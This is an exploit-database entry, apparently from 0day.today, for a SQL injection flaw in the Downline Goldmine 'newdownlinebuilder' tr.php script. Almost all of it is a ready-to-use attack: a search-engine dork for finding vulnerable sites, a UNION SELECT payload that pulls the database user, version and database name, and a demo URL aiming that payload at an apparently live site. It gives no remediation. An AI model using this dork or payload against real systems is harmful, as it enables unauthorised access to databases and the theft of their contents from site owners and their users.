id: 4031
date: 11/02/2008
title: Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln
author: Hussin X
cves: 

===================================================================
Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln
===================================================================


newdownlinebuilder (tr.php id) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script    : http://www.downlinegoldmine.com/

DorK   :  inurl:tr.php?id=

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--


Demo :
_______

http://www.downlinegoldmine.com/newdownlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--




#  0day.today [2023-03-23]  #